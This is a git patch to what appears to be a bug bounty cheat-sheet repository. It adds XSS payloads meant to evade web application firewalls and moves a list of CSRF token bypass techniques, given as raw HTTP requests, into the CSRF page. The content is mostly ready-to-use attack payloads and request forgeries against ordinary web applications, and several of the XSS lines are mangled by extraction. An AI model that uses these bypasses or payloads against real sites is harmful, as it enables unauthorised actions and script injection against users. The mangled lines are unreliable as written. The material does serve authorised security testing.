From 4f516068135b09580f3f9d6323493b5c9e5928a3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa Date: Tue, 8 Nov 2022 18:29:04 +0700 Subject: [PATCH] feat: added XSS payloads to bypass WAF --- Bypass/Bypass 304.md | 30 -------- Bypass/Bypass CSRF.md | 120 -------------------------------- Cross Site Request Forgery.md | 126 +++++++++++++++++++++++++++++++++- Cross Site Scripting.md | 92 +++++++++++++++++++++---- README.md | 10 +-- 5 files changed, 207 insertions(+), 171 deletions(-) delete mode 100644 Bypass/Bypass 304.md delete mode 100644 Bypass/Bypass CSRF.md diff --git a/Bypass/Bypass 304.md b/Bypass/Bypass 304.md deleted file mode 100644 index 21b62cc..0000000 --- a/Bypass/Bypass 304.md +++ /dev/null @@ -1,30 +0,0 @@ -# Bypass 304 (Not Modified) - -1. Delete "If-None-Match" header -``` -GET /admin HTTP/1.1 -Host: target.com -If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" -``` -Try this to bypass -``` -GET /admin HTTP/1.1 -Host: target.com -``` - -2. Adding random character in the end of "If-None-Match" header -``` -GET /admin HTTP/1.1 -Host: target.com -If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" -``` -Try this to bypass -``` -GET /admin HTTP/1.1 -Host: target.com -Host: target.com -If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b -``` - -## References -* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521) diff --git a/Bypass/Bypass CSRF.md b/Bypass/Bypass CSRF.md deleted file mode 100644 index f6bde6b..0000000 --- a/Bypass/Bypass CSRF.md +++ /dev/null @@ -1,120 +0,0 @@ -# Bypass CSRF - -1. Change single character -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab -``` - -2. Sending empty value of token -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token= -``` - -3. Replace the token with same length -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaabaa -``` -4. Changing POST / GET method -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 -Host: target.com -... -``` - -5. Remove the token from request -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456 -``` - -6. Use another user's valid token -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=ANOTHER_VALID_TOKEN -``` - -7. Try to decrypt hash -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=MTIzNDU2 -``` -MTIzNDU2 => 123456 with base64 - -8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=vi802jg9f8akd9j123 -``` -When we register again, the request like this -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=vi802jg9f8akd9j124 -``` -If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part diff --git a/Cross Site Request Forgery.md b/Cross Site Request Forgery.md index 2fcdafe..87f86f7 100644 --- a/Cross Site Request Forgery.md +++ b/Cross Site Request Forgery.md @@ -4,7 +4,7 @@ Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated ## Where to find -Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md) +Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. ## How to exploit 1. HTML GET Method @@ -92,4 +92,126 @@ xhr.send('{"role":admin}');
-``` \ No newline at end of file +``` + +# Bypass CSRF Token +But in some cases, even though there is a CSRF token on the form on the website. CSRF tokens can still be bypassed by doing a few things: + +1. Change single character +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab +``` + +2. Sending empty value of token +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token= +``` + +3. Replace the token with same length +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaabaa +``` +4. Changing POST / GET method +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 +Host: target.com +... +``` + +5. Remove the token from request +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456 +``` + +6. Use another user's valid token +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=ANOTHER_VALID_TOKEN +``` + +7. Try to decrypt hash +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=MTIzNDU2 +``` +MTIzNDU2 => 123456 with base64 + +8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=vi802jg9f8akd9j123 +``` +When we register again, the request like this +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=vi802jg9f8akd9j124 +``` +If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md index 1109185..59b1ecc 100644 --- a/Cross Site Scripting.md +++ b/Cross Site Scripting.md @@ -344,31 +344,22 @@ javascript://%250Aalert(1) ``` + - - - - - - -Function("\x61\x6c\x65\x72\x74\x28\x31\x29")(); "> -%2sscript%2ualert()%2s/script%2u -xss popup - - +%2sscript%2ualert()%2s/script%2u "Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm)) [1].map(confirm)'ale'+'rt'()a l e r t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``) + + @@ -379,11 +370,84 @@ Function("\x61\x6c\x65\x72\x74\x28\x31\x29")(); + + + +<--` --!> + + + +H#x + +'">